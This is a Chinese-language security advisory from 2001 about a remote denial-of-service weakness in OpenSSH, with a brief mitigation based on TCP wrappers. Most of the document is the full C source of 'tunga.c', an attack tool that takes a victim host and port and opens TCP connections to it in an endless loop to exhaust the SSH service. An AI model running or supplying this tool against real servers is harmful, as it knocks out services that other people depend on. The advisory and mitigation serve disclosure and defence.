Openssh 存在拒绝服务攻击发布时间:2001-12-12 更新时间:2001-12-12 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 openssh详细描述 openssh存在拒绝服务攻击,使用如下操作: $ ssh user@somehost.com ssh_exchange_identification: Connection closed by remote host 可以导致服务停止。 测试代码 --[ Code ]-- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { int sd, rc; struct sockaddr_in localAddr, servAddr; struct linger ling; struct hostent *h; if(argc < 3) { printf("tunga.c - OpenSSH DoS Attack\n"); printf("by DrBrain <drbrain@phibernet.org>\n"); printf("Phibernet Information Network < http://www.phibernet.org >\n\n"); printf("Usage: %s <victim> <port>\n\n",argv[0]); exit(1); } h = gethostbyname(argv[1]); if(h==NULL) { printf("%s: Unknown Host '%s'\n",argv[0],argv[1]); exit(1); } for(;;) { servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(atoi(argv[2])); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Cannot Open Socket "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("Cannot Connect "); exit(1); } } exit(0); } 解决方案 编译SSH服务程序支持libwrap(Tcp-wrappers),然后在/etc/hosts.{allow,deny} 中增加对源地址的控制。 相关信息 Pedro Inacio <drbrain@phibernet.org> 参考:http://www.securityfocus.com/archive/82/244767 |
